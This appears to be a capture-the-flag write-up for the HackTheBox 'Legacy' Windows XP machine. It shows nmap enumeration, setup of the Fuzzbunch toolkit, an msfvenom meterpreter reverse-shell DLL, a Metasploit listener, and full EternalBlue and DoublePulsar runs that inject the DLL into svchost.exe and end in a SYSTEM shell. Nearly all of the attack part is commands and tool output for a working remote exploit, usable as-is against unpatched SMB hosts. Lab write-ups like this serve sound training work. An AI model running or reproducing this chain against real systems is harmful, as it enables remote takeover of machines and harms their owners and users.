Enumeration
Port scanning
> sudo nmap -A 10.10.10.4
Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Exploitation
Installing Fuzzbunch on Linux
- Install wine and winetricks using the package manager of your linux distro.
- We initiate a wine32 environment (you may need to install 32-bit packages)
> WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot
- Install python26 via winetricks
> WINEPREFIX="$HOME/.wine-fuzzbunch" winetricks python26
- Get files from git
> cd $HOME/.wine-fuzzbunch/drive_c && git clone https://github.com/mdiazcl/fuzzbunch-debian
- I have written a little script to run fuzzbunch:
> sudo nano /usr/local/bin/fuzzbunch
export WINEPREFIX=$HOME/.wine-fuzzbunch
cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
wine ../../Python26/python.exe fb.py
> sudo chmod +x /usr/local/bin/fuzzbunch
Making the shellcode payload
We need a DLL shellcode payload. You can use msfvenom to make it or anything else you like:
> cd $HOME/.wine-fuzzbunch/drive_c/
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[INSERT_YOUR_IP_HERE] LPORT=60000 -f dll -o shell.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of dll file: 5120 bytes
Saved as: shell.dll
Setting up the listener
Again, you can use whatever listener you like. Here, I use the handler from metasploit:
> msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST=INSERT_YOUR_IP_HERE
msf exploit(handler) > set LPORT 60000
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on YOUR_IP_HERE:60000
Running fuzzbunch
> fuzzbunch
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\fuzzbunch-debian\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\fuzzbunch-debian\logs
[*] Autorun ON
[+] Set FbStorage => C:\fuzzbunch-debian\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 10.10.10.4
[?] Default Callback IP Address [] : [INSERT_YOUR_IP_HERE]
[?] Use Redirection [yes] : no
[?] Base Log directory [C:\fuzzbunch-debian\logs] :
[*] Checking C:\fuzzbunch-debian\logs for projects
Index Project
----- -------
0 Create a New Project
[?] Project [0] : 0
[?] New Project Name : LEGACY
[?] Set target log directory to 'C:\fuzzbunch-debian\logs\legacy\z10.10.10.4'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 10.10.10.4
[+] Set CallbackIp => [INSERT_YOUR_IP_HERE]
[!] Redirection OFF
[+] Set LogDir => C:\fuzzbunch-debian\logs\legacy\z10.10.10.4
[+] Set Project => legacy
Running EternalBlue
fb > use EternalBlue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
[?] Prompt For Variable Settings? [Yes] : y
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
[*] Target :: Operating System, Service Pack, and Architecture of target OS
*-> 0) XP Windows XP 32-Bit All Service Packs
1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] : 0
[+] Set Target => XP
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
0) DANE Forward deployment via DARINGNEOPHYTE
*-> 1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] : y
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445
[+] Configure Plugin Remote Tunnels
These are our final settings for EternalBlue:
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target XP
Now let’s execute it:
[?] Execute Plugin? [Yes] : y
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 00 Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
[+] Allocation total: 0xfff4
[+] Spray size: 0
[+] Allocation total: 0x1ffe8
[+] Spray size: 1
[+] Allocation total: 0x2ffdc
[+] Spray size: 2
[+] Allocation total: 0x3ffd0
[+] Spray size: 3
[+] Allocation total: 0x4ffc4
[+] Spray size: 4
[+] Allocation total: 0x5ffb8
[+] Spray size: 5
[+] Allocation total: 0x6ffac
[+] Spray size: 6
[+] Allocation total: 0x7ffa0
[+] Spray size: 7
[+] Allocation total: 0x8ff94
[+] Spray size: 8
[+] Allocation total: 0x9ff88
[+] Spray size: 9
[+] Allocation total: 0xaff7c
[+] Spray size: 10
[+] Allocation total: 0xbff70
[+] Spray size: 11
[+] Quota NOT exceeded after 12 packets
[+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending 2 non-paged pool fragment packets
....DONE.
[+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
[+] Sending 10 non-paged pool grooming packets
..........DONE.
[+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
Running DoublePulsar
fb Special (Eternalblue) > use DoublePulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*-> 0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*-> 0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] :
[*] Function :: Operation for backdoor to perform
0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
*-> 2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] :
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : C:\shell.dll
[+] Set DllPayload => C:\shell.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] : svchost.exe
[+] Set ProcessName => svchost.exe
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445
[+] Configure Plugin Remote Tunnels
These are our final settings for DoublePulsar:
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
DllPayload C:\shell.dll
DllOrdinal 1
ProcessName svchost.exe
ProcessCommandLine
Protocol SMB
Architecture x86
Function RunDLL
It’s important to change the ProcessName from lsass.exe to svchost.exe !!!
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x00811F87
SMB Connection string is: Windows 5.1
Target OS is: XP x86
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
Back to metasploit:
[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM :D